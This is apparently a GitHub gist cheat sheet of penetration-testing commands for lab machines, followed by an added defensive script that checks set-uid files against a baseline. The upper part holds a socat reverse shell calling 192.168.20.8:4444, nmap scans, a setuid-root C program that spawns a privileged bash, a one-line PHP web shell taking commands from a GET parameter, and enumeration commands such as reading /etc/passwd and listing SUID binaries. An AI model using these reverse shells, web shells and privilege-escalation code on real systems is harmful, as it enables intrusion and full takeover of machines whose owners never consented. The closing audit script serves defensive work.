
@Cuncis
Last active January 26, 2024 03:17
socat file:`tty`,raw,echo=0 tcp-listen:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.20.8:4444
nmap -p- --min-rate 10000 10.10.10.48
nmap -p 22,53,80,1877,32400,32469 -sCV 10.10.10.48
```````
cat file | xclip -selection clipboard
```````
# PrivEsc C CODE #
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
# Find vuln to escalate root access #
hostname
uname -a
lsb_release -a
cat /proc/version
cat /etc/issue
cat /etc/passwd
ps -A, ps axjf, ps aux
env
sudo -l
id
Find files:
find / -type f -perm -4000 2>/dev/null
find . -name flag1.txt: find the file named “flag1.txt” in the current directory
find /home -name flag1.txt: find the file named “flag1.txt” in the /home directory
find / -type d -name config: find the directory named config under “/”
find / -type f -perm 0777: find files with the 777 permissions (files readable, writable, and executable by all users)
find / -perm -a=x: find executable files
find /home -user frank: find all files for user “frank” under “/home”
find / -mtime -10: find files that were modified in the last 10 days
find / -atime -10: find files that were accessed in the last 10 days
find / -cmin -60: find files changed within the last hour (60 minutes)
find / -amin -60: find files accessed within the last hour (60 minutes)
find / -size 50M: find files with a 50 MB size
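
The `find / -type f -perm -4000` search above is also what an administrator runs to audit set-uid files against a reviewed baseline. The script below is an added example, not part of the original gist; the function names, the baseline file format (one absolute path per line) and the temporary fixture are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: report set-uid files that are missing from a reviewed baseline.
# All names and paths below are constructed for the demonstration.

# Print every regular file under $1 that has the set-uid bit, sorted.
# "-perm -4000" matches files with at least that bit set (any other bits
# may also be set); "-xdev" keeps find on a single filesystem.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# Print set-uid files under $1 that are not listed in baseline file $2.
# grep -v -x -F -f: drop lines that exactly match a fixed string in the baseline.
unexpected_suid() {
    list_suid "$1" | grep -vxFf "$2" || true   # empty result is not an error
}

# Constructed fixture: two set-uid files and one ordinary file in a temp dir,
# plus a baseline that approves only one of the set-uid files.
make_fixture() {
    local d
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/tmp"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"
    : > "$d/tmp/helper";     chmod 4755 "$d/tmp/helper"
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"
    printf '%s\n' "$d/usr/bin/passwd" > "$d/baseline.txt"
    echo "$d"
}

# Demo run: prints the single set-uid file that the baseline does not cover.
demo_dir=$(make_fixture)
unexpected_suid "$demo_dir" "$demo_dir/baseline.txt"
rm -rf "$demo_dir"
```

On a real host, point `list_suid` at `/` once to produce the baseline, review it, and alert on any later output from `unexpected_suid`.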